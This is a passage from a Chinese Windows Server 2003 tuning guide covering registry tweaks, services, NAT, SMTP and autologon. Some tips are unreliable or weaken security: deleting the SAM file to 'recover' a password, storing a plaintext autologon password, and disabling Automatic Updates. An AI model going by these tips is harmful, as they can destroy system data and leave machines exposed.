注意:调整虚拟内存部分经过个人测试无任何问题,但是不保证在您的机器上也是这样,所以我不对此设置造成的任何后果承担责任。只是建议对Windows server 2003关机速度有怨言的朋友尝试。十四、更改系统临时文件夹位置在非系统分区新建一个文件夹TEMP(如D:\TEMP)准备准系统临时文件移动到该文件夹,右键点击“我的电脑”-->属性-->高级-- >环境变量和系统变量栏目中找到TEMP和TMP项,然后单击编辑,将原来的路径前面的%systemroot%改为D:\TEMP即可,共四项. 右键点击桌面上的Internet Explorer图标,选择属性,在“常规”选项卡中的“Internet 临时文件”栏目中点击“设置”按钮,在弹出的设置窗口中点击“移动文件夹”按钮,然后选择你想移动到的非系统分区的文件夹(如D:\TEMP)点确定即可. 用同样的方法亦可移动我的文档或一些应用程序的临时文件十五.更改系统虚以内存到其它非系统分区右键点击我的电脑-->属性-->高级-->性能栏目中点击“设置”按钮-->选择高级选项卡,在虚拟内存栏目中点击“更改”按钮 -->在驱动器列表框内可看到当前系统分配的虚拟内存的最小值和最大值数.在驱动器列表框内点击非系统分区(如D盘),然后点击“自定义系统虚以内存大小”,在最小值和最大值处输入相同的数值.数值的大小约为内存大小的2倍即可.内存在512M以上时倍数应减小. 十六、让系统自动关闭停止回应的程序点击“开始”,选择“运行”,然后输入“regedit”回车。即可打开注册表编辑器,打开 HKEY_CURRENT_USER\Control Panel\Desktop 键,将 AutoEndTasks 值设为 1。 ( 原设定值:0 十七、允许内置的IMAPI CD-Burning服务和支持Windows影像设备服务 1, 假如你希望启用Windows内置的IMAPI CD-Burning服务。请打开“开始”--> “运行”,键入“Services.msc”回东,在出现的“服务窗口”中找到“IMAPI CD-Burning COM Service”并双击它,然后在启动模式的下拉菜单选择“自动”,并点击 “应用”-->“开始”--> “确定” 2,假如你有数码相机和扫描仪之类的影像设备,你应该打开 Windows Image Acquisition 服务。打开“开始”--> “运行”,键入“Services.msc ”,在出现的窗口中找到“Windows Image Acquisition (WIA)”并双击它,然后在“启动模式”的下拉菜单选择“自动”,并点击“应用”-- >“开始”--> “确定” 3.正常运行Windows所需要的虚拟内存是作为物理内存的“后备力量”而存在的,虽然运行速度上硬盘不如内存,但在容量上内存是无法与硬盘相提并论的。所以我们一直是认为虚拟内存越大越好,其实事实上并不是这样的,尤其是安装 Windows server 2003用做工作站的环境下并不承担高负荷工作的情况下,我们可以试试禁用虚拟内存。前提是你必须拥有512M物理内存以上。很多朋友担心如果禁用虚拟内存会不会象在Windows 9x环境下一样造成系统无法正常待机和休眠的情况,其实不会这样的,因为从 windows xp开始它的虚拟内存(即pagefile.sys)是专用于数据交换的,待机模式时数据依旧保留在物理内存中,休眠模式也有其专用的休眠文件(Hiberfil.sys),所以绝对不会出现系统无法休眠的问题。而使用Windows server 2003的一些朋友经常会对其的关机和注销缓慢感到束手无策,在此我个人的解决办法就是禁用虚拟内存,这样你的注销和关机时间可能会加快很多。我做了测试,在加载虚拟内存的情况下注销用户重登陆windows的时间是3秒,关机是23秒。但是在禁用虚拟内存的情况下注销重登陆的时间减少到2秒,而关机时间缩短到3秒。 右键点击“我的电脑”-->属性-->高级-->性能-->设置-->高级,点击“虚拟内存”部分的“更改”,然后在出现的窗口选择“无分页文件”。重启系统即可。 注意:调整虚拟内存部分经过个人测试无任何问题,但是不保证在您的机器上也是这样,所以我不对此设置造成的任何后果承担责任。只是建议对Windows server 2003关机速度有怨言的朋友尝试。十八、Windows2003中不常见的安全隐患的防堵方法 尽管Windows 2003的功能在不断增强,但是由于先天性的原因,它还存在不少安全隐患,要是不将这些隐患“堵住”,可能会给整个系统带来不必要的麻烦;下面笔者就介绍Windows2003中不常见的安全隐患的防堵方法,希望能对各位带来帮助! 1.堵住自动保存隐患 Windows 2003 操作系统在调用应用程序出错时,系统中的Dr. Watson会自动将一些重要的调试信息保存起来,以便日后维护系统时查看,不过这些信息很有可能被黑客 “瞄上”,一旦瞄上的话,各种重要的调试信息就会暴露无疑,为了堵住Dr. Watson自动保存调试信息的隐患,我们可以按如下步骤来实现:打开开始菜单,选中“运行”命令,在随后打开的运行对话框中,输入注册表编辑命令“regedit”命令,打开一个注册表编辑窗口;在该窗口中,用鼠标依次展开 HKEY_local_machine\software\Microsoft\WindowsNT\CurrentVersion\AeDebug分支,在对应AeDebug键值的右边子窗口中,用鼠标双击Auto值,在弹出的参数设置窗口中,将其数值重新设置为“0”;打开系统的Windows资源管理器窗口,并在其中依次展开Documents and Settings文件夹、All Users文件夹、Shared Documents文件夹、DrWatson文件夹,最后将对应DrWatson中的User.dmp文件、Drwtsn32.log文件删除掉。完成上面的设置后,重新启动一下系统,就可以堵住自动保存隐患了。 2.堵住资源共享隐患 为了给局域网用户相互之间传输信息带来方便, Windows Server 2003系统很是“善解人意”地为各位提供了文件和打印共享功能,不过我们在享受该功能带来便利的同时,共享功能也会“引狼入室”,“大度”地向黑客们敞开了不少漏洞,给服务器系统造成了很大的不安全性;所以,在用完文件或打印共享功能时,大家千万要随时将功能关闭哟,以便堵住资源共享隐患,下面就是关闭共享功能的具体步骤:执行控制面板菜单项下面的“网络连接”命令,在随后出现的窗口中,用鼠标右键单击一下“本地连接”图标;在打开的快捷菜单中,单击“属性”命令,这样就能打开一个“Internet协议(TCP/IP)”属性设置对话框;在该界面中取消 “Microsoft网络的文件和打印机共享”这个选项;如此一来,本地计算机就没有办法对外提供文件与打印共享服务了,这样黑客自然也就少了攻击系统的 “通道”。 3.堵住远程访问隐患在Windows2003系统下,要进行远程网络访问连接时,该系统下的远程桌面功能可以将进行网络连接时输入的用户名以及密码,通过普通明文内容方式传输给对应连接端的客户端程序;在明文帐号传输过程中,实现“安插”在网络通道上的各种嗅探工具,会自动进入“嗅探”状态,这个明文帐号就很容易被“俘虏”了;明文帐号内容一旦被黑客或其他攻击者另谋他用的话,呵呵,小心自己的系统被“疯狂”攻击吧!为了杜绝这种安全隐患,我们可以按下面的方法来为系统“加固”:点击系统桌面上的“开始”按钮,打开开始菜单;从中执行控制面板命令,从弹出的下拉菜单中,选中“系统”命令,打开一个系统属性设置界面;在该界面中,用鼠标单击“远程”标签;在随后出现的标签页面中,将“允许用户远程连接到这台计算机”选项取消掉,这样就可以将远程访问连接功能屏蔽掉,从而堵住远程访问隐患了。 4.堵住用户切换隐患 Windows 2003系统为我们提供了快速用户切换功能,利用该功能我们可以很轻松地登录到系统中;不过在享受这种轻松时,系统也存在安装隐患,例如我们要是执行系统“开始”菜单中的 “注销”命令来,快速“切换用户”时,再用传统的方式来登录系统的话,系统很有可能会本次登录,错误地当作是对计算机系统的一次暴力“袭击”,这样 Windows2003系统就可能将当前登录的帐号当作非法帐号,将它锁定起来,这显然不是我们所需要的;不过,我们可以按如下步骤来堵住用户切换时,产生的安全隐患:在Windows 2003系统桌面中,打开开始菜单下面的控制面板命令,找到下面的“管理工具”命令,再执行下级菜单中的“计算机管理” 命令,找到“用户帐户”图标,并在随后出现的窗口中单击“更改用户登录或注销的方式”;在打开的设置窗口中,将“使用快速用户切换”选项取消掉就可以了。 5.堵住页面交换隐患 Windows 2003操作系统即使在正常工作的情况下,也有可能会向黑客或者其他访问者泄漏重要的机密信息,特别是一些重要的帐号信息。也许我们永远不会想到要查看一下,那些可能会泄漏隐私信息的文件,不过黑客对它们倒是很关心的哟!Windows 2003操作系统中的页面交换文件中,其实就隐藏了不少重要隐私信息,这些信息都是在动态中产生的,要是不及时将它们清除,就很有可能成为黑客的入侵突破口;为此,我们必须按照下面的方法,来让 Windows 2003操作系统在关闭系统时,自动将系统工作时产生的页面文件全部删除掉:在Windows 2003的“开始”菜单中,执行“运行” 命令,打开运行对话框,并在其中输入“Regedit”命令,来打开注册表窗口;在该窗口的左边区域中,用鼠标依次单击 HKEY_local_machine\system\currentcontrolset\control\sessionmanager\ memory management键值,找到右边区域中的ClearPageFileAtShutdown键值,并用鼠标双击之,在随后打开的数值设置窗口中,将该DWORD值重新修改为“1”;完成设置后,退出注册表编辑窗口,并重新启动计算机系统,就能让上面的设置生效了。十九、自己定制系统对话框在Windows XP/2003 中单击“开始→运行”,在弹出的运行对话框中输入“gpedit.msc”,回车后打开“组策略”编辑器。在“组策略”编辑器窗口中,依次单击“用户配置 →管理模板→Windows组件→Windows资源管理器→通用打开文件对话框”,此时在右边的窗口中可以看到一个“位置栏中显示的项目”选项,双击该选项,弹出属性对话框,在“设置”选项卡下,选择“已启用”项前面的单选按钮,可以看到“显示的位置”下的“项目1”、“项目2”等后面的文本框已经激活了,这5个项目分别代表“位置栏”中从上到下显示的项目列表。在这五个项目后面的文本框中输入自己经常访问的文件夹或者是盘符路径,就可以DIY公用对话框上的按钮了。注意:在这里输入的内容必须符合一定的规则,否则快速定位按钮将成为一个空链接,不能让你快速定位。输入的内容可以是:(1) 指向本地文件夹的快捷方式(如,C:\Windows);(2) 指向远程文件夹的快捷方式(如\\server\share,这对那些经常通过局域网共享文件的用户来说非常方便);(3)公共外壳文件夹,如Common Documents,Common Music,Common Pictures, Desktop,My Computer,My Documents,My Favorites,My Music, My NetworkPlaces,My Pictures,Printers,Program Files,Recent。 二十、启用 ASP 支持: Windows Server 2003 默认安装,是不安装 IIS 6 的,需要另外安装。安装完 IIS 6,还需要单独开启对于 ASP 的支持。方法是: 控制面板 -> 管理工具 -> Web服务扩展 -> Active Server Pages -> 允许。 二十一、如何使用USB硬盘、U盘,添加已经有分区的硬盘右键单击“我的电脑”-->“管理”-->“磁盘管理”,在相应的硬盘上执行分配盘符操作和导入。可立即生效,下次再接入时它会自动分配盘符. 二十二.怎样自动登录到中文Windows 2000/2003中用户必须在登录界面中输入用户名和密码之后才能够登录到中文Windows 2000/2003中。其实,Win2000/2003也提供了在启动时自动以某组用户名和密码进行登录的功能,实现自动登录系统的操作方法如下: 1. 选择“开始”-->“运行”,然后输入“regedit”,打开注册表编辑器。定位到“HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\WinLogon”。 2. 双击“DefaultDominName”,并在出现的“编辑字符串”窗口中的“数据数值”栏中输入要登录的域名, 如果该机器不在域中,则该值项的值为该计算机的名称.随后单击“确定”按钮。 3. 双击“DefaultUserName”数值名称,并在出现的“编辑字符串”窗口中的“数据数值”栏中输入要登录到此域的用户名(例如“mnbvcxz”),随后单击“确定”按钮。 4. 在右边窗口中,单击鼠标右键,依次选择“新建”-->“字串值”,将新建的字串值命名为“AutoAdminLogon”的数值名称。再使用鼠标左键双击刚添加的“AutoAdminLogon”数值名称,并在出现的“编辑字符串”窗口中的“数据数值”栏中将值设为1,随后单击“确定”按钮。 5. 在右边窗口中,单击鼠标右键,依次选择“新建”-->“字串值”命令项,将新建的字符值命名为“DefaultPassword”的数值名称。再使用鼠标左键双击“DefaultPassword”数值名称,并在出现的“编辑字符串”窗口中的“数据数值”栏中输入用户的登录密码,随后单击“确定”按钮。 退出注册表编辑器窗口,重新启动计算机,此时系统自动以此用户名登录,而再也不需要手工输入用户名和密码了(如果在登录过程中一直按住 Shift键,就会出现提示输入用户名和密码的对话框)。如果需要取消自动登录功能,只要使用鼠标选择方式将当前子键位置定位于此处,然后将 AutoAdminLogon键值由1修改为0即可。 二十三.停止或完全关闭2003中的信使服务的方法∶ 1.停止2003自动启动信使服务的方法∶ 点击“开始”—“运行”—在“运行”窗口键入 gpedit.msc ,然后点“确实”按钮,打开“组策略”窗口。在“组策略”窗口中,依次展开-- >计算机配置-->管理模板-->Windows 组件-->Windows Messengenger,用鼠标左键单击 “Windows Messengenger”,这时在“组策略”窗口右侧框内,找到“初始化时不自动启动Windows Messengenger”并用鼠标右键单击它,在弹出的菜单中点“属性”,在属性窗口中选“启用”,然后单击“确定”并关闭窗口。这样,下次启动计算机时XP的信使服务将不会自动运行,但可手动启动。 2.完全关闭2003中的信使服务的方法∶ 点击“开始”—“运行”—在“运行”窗口键入 gpedit.msc ,然后点“确实”按钮,打开“组策略”窗口。在“组策略”窗口中,依次展开-->计算机配置-->管理模板-->Windows 组件-- >Windows Messengenger,用鼠标左键单击“Windows Messengenger”,这时在“组策略”窗口右侧框内,找到 “不允许运行Windows Messengenger”并用鼠标右键单击它,在弹出的菜单中点“属性”,在属性窗口中选“启用”,然后单击“确定”并关闭窗口。下次启动计算机后,XP的信使服务将不可用。如果要启用该服务,只要改回去即可。注意∶在组策略窗口中,“计算机配置”中的设置,将覆盖“用户配置” 二十四.跳过磁盘检修等待时间 一旦计算机因意外原因,例如突然停电或者死机的话,那么计算机下次重新启动的话,系统就会花10秒钟左右的时间,来运行磁盘扫描程序,检查磁盘是否有错误出现。要是你是一位惜时如金的人,肯定不会白白等待下去的。那就跟我一起来,跳过这段检查等待时间吧: 1、在开始菜单中,依次执行“程序”/“附件”/“命令提示符”命令,将界面切换到DOS命令行状态下; 2、直接输入“CHKNTFS/T :0”命令,单击回车键后,系统就能自动将检查磁盘的等待时间修改为0了; 3、下次遇到异常情况,重新启动计算机后,系统再调用磁盘扫描程序时,就不需要等待了。 二十五.为指定组添加新用户 想在Windows Server 2003系统中添加新用户时,发现该系统控制面板窗口中却没有我们非常熟悉的“用户”图标,那么我们该从哪里着手,才能为系统的指定组添加新用户呢?呵呵,Windows Server 2003看来就是不一样!笔者经过几次摸索,发现为指定组添加新用户的方法,具体步骤如下: 1、用鼠标右键单击桌面上的“我的电脑”图标,从打开的快捷菜单中,执行“管理”命令,弹出一个计算机管理窗口; 2、展开该窗口中的“本地用户和组”文件夹,然后选中该文件夹下面的“用户”选项,此时在右边的子窗口中,我们就能看到当前系统中已经存在的所有用户了,其中标有红色叉号的用户表示已经创建但并没有启用; 3、用鼠标右键单击右边子窗口的空白处,从右键菜单中执行“添加新用户”命令,在随后出现的窗口中,输入需要添加的用户的相关信息,最后单击一下“创建”按钮,来结束新用户的添加工作; 4、要想让该用户添加到指定组的话,可以选择“组”选项,再从右边的子窗口中,选中需要加入的组名称,并用鼠标右击之,执行快捷菜单中的“添加到组”命令; 5、在随后出现的界面中,再单击“添加”命令,将前面创建的用户添加进来就可以了。二十六.建立一个新的用户账号 windows server 2003 不支持类似于Windows XP的登录欢迎屏幕。你可以在首次进入系统后建立一个有你个性的新用户账号。打开“开始”(Start) ->“运行”(Run)-> 键入“lusrmgr.msc ”,你将看到本地用户和组(Local Users and Groups )右键点击左边窗口的“用户”(Users),选择“新用户”(New User).在弹出的对话框中输入账号信息,然后点击“建立”(Great)。这样你的账号就可用了,当然,你可以选择把你的账号添加到管理员组,右键点击你新建的用户。然后选择“属性”(Properties)-> 点击“隶属于” on Member of tab -> “添加”Add.. -> “高级”Advanced -> “现在查找” Find Now 。在查找结果对话框中双击“管理员”(Administrators),在点击两次“确定”(Ok)后关闭“本地用户和组” (Local Users and Groups window ),现在你将可以注销Administrator用户用你自己的账号登录系统。 二十七安装Java VM Windows server 2003没有集成MS Java VM或Sun Java VM,你可以自行下载并安装它。二十八.隐藏文件 Windows Server 2003默认情况下是显示所有的文件夹的,如果你不想这样,可以通过一下方法来隐藏: 打开任意一个文件夹,选择 “工具” -> 文件夹选项 -> 查看,选择“不显示隐藏的文件和文件夹”,点击“确定”。 二十九.启用 ASP 支持 Windows Server 2003 默认安装,是不安装 IIS 6 的,需要另外安装。安装完 IIS 6,还需要单独开启对于 ASP 的支持。方法是: 控制面板 -> 管理工具 -> Web服务扩展 -> Active Server Pages -> 允许 . 三十.加快启动和运行速度 修改注册表,减少预读取,减少进度条等待时间:开始→运行→regedit启动注册表编辑器,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters,有一个键值名为EnablePrefetcher,它的值是3,把它改为“1”或“5”。 找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control, 将 WaitToKillServiceTimeout 设为:1000或更小。 ( 原设定值:20000 找到 HKEY_CURRENT_USER\Control Panel\Desktop 键,将右边视窗的WaitToKillAppTimeout 改为 1000, ( 原设定值:20000 即关闭程序时仅等待1秒。 将 HungAppTimeout 值改为:200( 原设定值:5000 ,表示程序出错时等待0.5秒。 三十一.改变窗口弹出的速度 开始→运行→regedit启动注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop\ WindowMetrics子键分支,在右边的窗口中找到MinAniMate键值,其类型为REG_SZ,默认情况下此健值的值为1,表示打开窗口显示的动画,把它改为0,则禁止动画显示,接下来从开始菜单中选择“注销”命令,激活刚才所作的修改。 三十二.在Win 2003中配置NAT服务器 如何通过使用Windows Server 2003来配置网络地址转换(NAT)服务器。Windows Server 2003“路由和远程访问”服务包括NAT路由协议。如果将NAT路由协议安装和配置在运行“路 由和远程访问”的服务器上,则使用专用Internet协议(IP)地址的内部网络客户端可以通过NAT服务器的外部接口访问Internet。 1.如何配置路由和远程访问NAT服务器:当内部网络客户端发送要连接Internet的请求时,NAT协议驱动程序会截取该请求,并将其转发到目标Internet服务器。所有请求看上去都像是来自NAT服务器的外部IP地址。这样就隐藏您的内部IP地址配置。 2.配置“路由和远程访问”NAT服务器:在管理工具菜单中,选中“路由和远程访问”。在“路由和远程访问”MMC中,展开您的服务器名称(其中服务器名称是您要配置服务器的名称,然后展开左窗格中的IP路由。选中常规,然后选择新建路由协议。单击NAT/基本防火墙复选框,将其选中,然后点确定。右键单击左窗格中的NAT/基本防火墙,然后单击新建接口。单击表示内部网络接口的接口,然后单击确定。在“网络地址转换”属性中,单击“专用接口连接到专用网络”,然后单击确定。右键单击左窗格中的NAT/基本防火墙,然后点新建接口。单击表示外部网络接口的接口,然后点确定.在“网络地址转换”属性中,单击“公用接口连接到Internet”。单击“在此接口上启用NAT”复选框,将其选中,点确定。 NAT服务器可以自动为内部网络客户端分配IP地址。如果您没有已给内部网络上的客户端分配了地址信息的DHCP服务器,则可能会需要使用此功能。 如何配置路由和远程访问NAT服务器以分配IP地址和执行代理DNS查询NAT服务器还可以代表NAT客户端执行域名系统(DNS)查询。“路由和远程访问”NAT服务器对包括在客户端请求中的Internet主机名进行解析,然后将该IP地址转发给该客户端。 要配置“路由和远程访问”NAT服务器来分配IP地址并且代表内部网络客户端执行代理DNS查询,请按以下步骤操作:右键单击左窗格中的NAT/基本防火墙,然后单击属性。单击地址分配选项卡,然后单击“使用DHCP自动分配IP地址”复选框,将其选中。在IP地址框中,键入网络ID。在掩码框中,键入子网掩码。选择名称解析选项卡,然后单击“使用域名系统(DNS)的客户端”复选框,将其选中。如果您使用请求拨号接口连接到Internet,请单击 “当名称需要解析时连接到公用网络”复选框,将其选中。在请求拨号接口框中,选中要拨号的接口。选择应用,然后单击确定。 备注:完成这些基本配置步骤之后,内部网络客户端就可以访问Internet上的服务器了。 如何配置基于Windows Server 2003的计算机以使用NAT服务器.单击开始,指向控制面板,指向网络连接,然后单击本地连接。单击属性。单击Internet协议(TCP/IP)。单击属性。在“默认网关”框中,键入NAT服务器的内部IP地址。 备注:如果计算机从“动态主机配置协议”(DHCP)服务器接收它的IP地址,请单击高级,单击IP设置选项卡,单击网关下的添加,键入NAT服务器的内部IP地址,单击添加,单击确定,然后继续进行第6步.单击确定,单击确定,然后单击关闭。 三十三.在Win 2003中为SMTP服务配置本地域 如何在Windows Server 2003中为SMTP服务配置本地域。如何更改默认域的名称、配置别名域以及指定Drop文件夹。SMTP服务域用于组织要传递的消息。SMTP虚拟服务器至少有一个域:默认的本地域。本地域是由本地SMTP服务器提供服务的域名系统(DNS)域。到达SMTP服务器的包含本地域名的消息或者在本地传送到Drop文件夹,或者与不可传递的(NDR)报告一起返回给发送方。 如何重命名默认域 默认域用于给来自不含有域的地址的消息加盖戳记。SMTP虚拟服务器必须有一个默认域。无法删除此默认域。 默认情况下,在“控制面板”系统工具的计算机名选项卡中指定的名称被用作默认域名。也可以指定一个唯一的名称作为SMTP服务的默认域名。 要重命名默认域,请按照下列步骤xx作: 启动MicrosoftInternet信息服务(IIS)管理器或打开IIS管理单元。展开Server_name,其中Server_name是服务器的名称,然后展开所需的SMTP虚拟服务器(例如,默认SMTP虚拟服务器)。单击域。在右窗格中,右击默认域,然后单击重命名。键入要使用的名称,然后按ENTER键。退出IIS管理器或关闭IIS管理单元。 如何配置别名域 别名域是默认域的别名。可以使用与默认域相同的设置来设置别名域。SMTP服务接收的别名域的消息放置在为默认域指定的Drop文件夹中。要配置别名域,请按照下列步骤xx作:启动IIS管理器或打开 IIS管理单元。展开Server_name,其中Server_name是服务器的名称,然后展开所需的SMTP虚拟服务器(例如,默认SMTP虚拟服务器)。右键单击域,指向新建,然后单击域。“新建SMTP域向导”启动。单击别名,然后单击下一步。在名称框中键入别名域的名称,然后单击完成。退出 IIS管理器或关闭IIS管理单元。 如何指定Drop文件夹 对于默认域,您必须指定一个放置所有传入消息的文件夹。SMTP 服务将别名域的消息放在默认域所使用的Drop文件夹中。默认情况下,Drop文件夹位于Inetpub\Mailroot文件夹中。您可以将任何文件夹指定为Drop文件夹,只要该文件夹是安装SMTP服务的计算机上的本地文件夹,而且没有指定为Pickup文件夹。 要更改Drop文件夹的位置,请按照下列步骤xx作:启动IIS管理器或打开IIS管理单元。展开Server_name,其中Server_name是服务器的名称,然后展开所需的SMTP虚拟服务器(例如,默认SMTP虚拟服务器)。单击域。在右窗格中,右击默认域,然后单击属性。单击浏览,找到要用作Drop文件的文件夹,然后单击确定。单击确定。 三十四.为Win 2003中添加LPT端口 如何在基于 Microsoft Windows Server 2003 的计算机中添加附加LPT端口。默认情况下,在Windows Server 2003 中存在3个 LPT可用端口,它们是 LPT1、LPT2 和 LPT3。可以添加附加LPT端口直到LPT9。添加附加 LPT 端口后,该端口作为可用打印机端口显示在“添加打印机向导”中。 如何添加附加LPT端口单击开始\运行.注意:“注册表编辑器”使用不当可造成严重问题,这些问题可能需要重新安装操作系统。Microsoft 不保证能够解决因为“注册表编辑器”使用不当而产生的问题。使用“注册表编辑器”需要您自担风险。在打开框键入 regedit,然后单击确定。找到并单击下面的注册表项: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports 当前 LPT 端口显示在右窗格中。在编辑菜单上,指向新建,然后单击字符串值。 键入新值名称。键入 LPT#,其中 # 是所要添加 LPT 端口的序号,然后按 ENTER。例如,键入 LPT4。在文件菜单上,退出“注册表编辑器”。单击开始\运行。在打开框键入cmd,单击确定。停止然后重新启动假脱机服务。为此,请在命令提示符下键入下列命令,在每行后按ENTER 键: net stop spooler net start spooler 键入exit退出命令提示符。 三十五、在关机时清理页面文件打开“开始”-->“控制面板”-->“管理工具”→“本地安全策略”,在“本地安全策略”窗口中展开→“本地策略”→“安全选项”,在右框内双击其中的“关机:清理虚拟内存页面文件”一项,点击弹出选单中的“已启用”选项,单击“确定”即可。这样关机时会自动整理页面文件,可提高系统启动速度. 三十六.调整系统性能开始→运行→regedit启动注册表编辑器,找到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management 1. 输入/输出性能,建一个DWORD值,命名为IOPageLockLimit。这个优化只对server用户才有实在意义——它能够提升系统进行大容量文件传输时的性能。在默认情况下,这个键值在注册表中是不存在的,必须自己建一个,多数人在使用这项优化时都发现8到16M字节之间性能最好,具体设什么值,可以设进去试试看哪个值可以获得最佳性能。记住这个值是用字节来计算的,它的十进制值.因此,譬如你要分配12M的话,就是 12 * 1024 * 1024,也就是12582912。跟前面的内存优化一样,只有当你的内存大于256M的时候才好更改这里的值。 2.禁用内存页面调度, 在正常情况下,XP会把内存中的片断写入硬盘,我们可以阻止它这样做,让数据保留在内存中,从而提升系统性能。要注意的是,拥有很多内存的用户(256M以上)才好使用这个设置。这个设置的名字正如它的功能一样,叫“DisablePagingExecutive”。把它的值从0改为1 就可以禁止内存页面文件调度了。 3.提升系统缓存,把LargeSystemCache键值从0改为1,Windows XP就会把除了4M之外的系统内存全部分配到文件系统缓存中,这意味着XP的内核能够在内存中运行,大大提高系统速度。剩下的4M内存是用来做磁盘缓存的,在一定条件下需要的时候,XP还会分配更多一些。一般来说,这项优化会使系统性能得到相当的提升,但也有可能会使某些应用程序性能降低。正如前面所说的,必须有256M以上的内存,才好激活LargeSystemCache,否则不要动它。 4.二级高速缓存:一般windows不会正确判断你的cpu二级高速缓存的数值,需要自己设置,在以上注册表位置新建一个DWORD值,命名为“SecondLevelDataCache”如果cpu二级高速缓存为128K即将 SecondLevelDataCache的十进制值设为128 例如: PIII Coppermine/P4 Willamette是"256", Athlon XP是"384",P4 Northwood是"512" 三十七.加速浏览局域网速度开始→运行→regedit启动注册表编辑器,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\ 将其下的主键{2227A280-3AEA-1069-A2DE-08002B30309D}删除,该主键是网络(打印机) 将其下的主键{D6277990-4C6A-11CF8D87-00AA0060F5BF}删除,该主键是(计划任务) 三十八.卸载无用的动态连接资源管理器经常在内存中留下无用的动态链接,为了消除这种现象,你可以打开注册表编辑器,设置键值:HKEY_LOCAL_MACHINE\ SOFTWARE \Microsoft\Windows\ CurrentVersion\Explorer AlwaysUnloadDLL=DWORD: 1将其设为0,这一功能就会被关闭。注意:为了让设置生效,需要重新启动计算机。三十九.取消对zip文件的注册,加速运行 xp/2003都内置了对zip压缩文件的支持,方便了用户的同时也占用了系统资源.不如安装其它压缩和解压缩软件支持更多类型的压缩文件,在需要用到时才打开.操作方法:开始--运行“regsvr32 /u zipfldr.dll” 四十、关闭程序出错信息打开“开始”-->“所有程序”-->附件-->系统工具-->单击“系统信息”,在系统信息窗口中点击“工具”,在弹出的菜单中点击“Dr Watson” ,留卜:“转储全部线程上下文” 删除其余各项。四十一、清除“Windows 文件保护”文件缓存 在命令提示符下运行SFC.exe/purgecache(减少300M), 系统文件检查程序(sfs) 在重新启动计算机后扫描和验证所有受保护的系统文件。 语法 sfc [ /scannow ] [ /scanonce ] [ /scanboot ] [ /revert ] [ /purgecache ] [ /cachesize=x] 参数 /scannow 立即扫描所有受保护的系统文件。 /scanonce 一次扫描所有受保护的系统文件。 /scanboot 每次重新启动计算机时扫描所有受保护的系统文件。 /revert 将扫描返回到默认操作。 /purgecache 立即清除“Windows 文件保护”文件缓存,并扫描所有受保护的系统文件。 /cachesize=x 设置“Windows 文件保护”文件缓存的大小,以 MB 为单位。 /? 在命令提示符下显示帮助。注释 • 必须以 Administrators 组成员的身份登录才能运行 sfc 。 • 如果 sfc 发现受保护的文件已经被覆盖,它会从 systemroot \system32\dllcache 文件夹获取该文件的正确版本,然后替换不正确的文件。 • 如果 systemroot \system32\dllcache 文件夹已经损坏或者不能使用,则使用 sfc /scannow 、 sfc /scanonce 或 sfc /scanboot 修复 Dllcache 目录的内容。 四十二、禁用多余服务: 右键我的电脑-管理-服务和应用程序-服务 1.Autometicupdates (自动更新) 2.Clipbook Server (文件服务) 3.ErrorReporting (出错报告) 4.Fast User Switching Compatibility (快速用户切换兼容性) 5.FAx (传真服务) 6.Messenger (局域网或信息传递) 7.NT LM Security Support (NT LM安全支持提供商) 8.NetworK DDE (动态数据交换) 9.NetworK DDE DSDM (动态数据交换) 10.NeLogon (网络注册) 11.Printer Spooler (打印服务) 12.Remote Desktop Help Session Manager (远程桌面帮助会话管理) 13.RemoteRegistry (提供远程服务修改注册表) 14.Tasksoheduler (计划任务) 15.Uninterrcptble (UPS电源) 16.Windows Image Acquisition (WIA) (Windows 图像获取 WIA 为扫描仪照相机提供图像捕获以上项目均改为禁用或者手动 17.IMapicd-Burnin (影象设备支援设为:自动并且开启) 四十三Windows减肥: windows\drivercache\*.* 备份文件可以删除 82.7M windows\ime\imejp\*.* windows\ime\imej98\*.* windows\ime\imejp8-1\*.* windows\ime\imek6-1\*.* 日;韩输入法 共:73.4M c:\documents and settings\xxx\localsettings\temp\*.* (xxx为用户名) temporary intarnet Files\*.* 以上均可以删除可以减肥:160M之多。 c:\windows\prefetch\*.* 定期删除之。四十四失掉的 *.exe 关联的恢复在安全模式下运行:assoc .exe=exefile (注意:assoc .exe 有空格) 然后:Ctrl+Alt+Del 调出“windows安全”按关机选择重新启动四十五、解决2000/xp/2003密码丢失 删除以下文件: a. c:\windows\system32\config\"SMA" 256K 大小 b. documentsandsettings\administrator\"cookies" 四十六、双启动菜单丢失: a.新安装->选R-->恢复控制台,选“1”键入管理员密码 b.再键入:"BOOTCFG/ADD" d.然后选择:“1” e.然后输入:“microsoft windows xp professional” f.提示:加载 OS 项,键入:“fastdetect” 回车 g.然后键入:“exit” 重新启动。 h.最后,把带“$”的文件及文件夹全部删除即可。四十七、为irq中断请求排优先次序 计算机的每一个主要部件都设了个IRQ中断号。这里就是要通过修改每个IRQ请求的优先次序达到优化目的。这里主要的优化对象是系统/CMOS实时钟,它通过主板来提升性能。首先,要确定你想要哪个组件获得更高的性能,然后找到这个硬件正在使用的IRQ中断号。怎么找呢?打开控制面板里的系统属性(也可以按键盘上的Windows+Break热键组合打开它)。选中"硬件"选项卡,然后点击" 设备管理器"按钮。右键点击要查IRQ号的组件,选择"属性",然后点击"资源"选项卡。 这里可以看到设备正在使用的IRQ中断号(如果没有IRQ中断号,选择另一个设备)。把中断号记下来,然后运行注册表编辑器regedit,找到注册中的 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ PriorityControl 位置。我们要在这 里建立一个名为IRQ#Priority(其中"#"是具体的IRQ中断号)的DWORD双字节值,然后把它的值设为1。譬如说,我的系统CMOS实时钟的IRQ中断号是8,我要建立的键名就是IRQ8Priority。重新启动计算机之后,就会发现刚优化过的组件性能有所提高。笔者强烈建议用这个方法优化系统CMOS实时钟,因为它能改善整块主板的性能。当然也可以把多个IRQ中断号优先级提高,但这样做的效果没那么好,而且有可能造成系统不稳定。要把这个优化设置撤消的话,只要把刚才建立的注册表键值删掉就OK了。四十八、 清空远程可访问的注册表路径 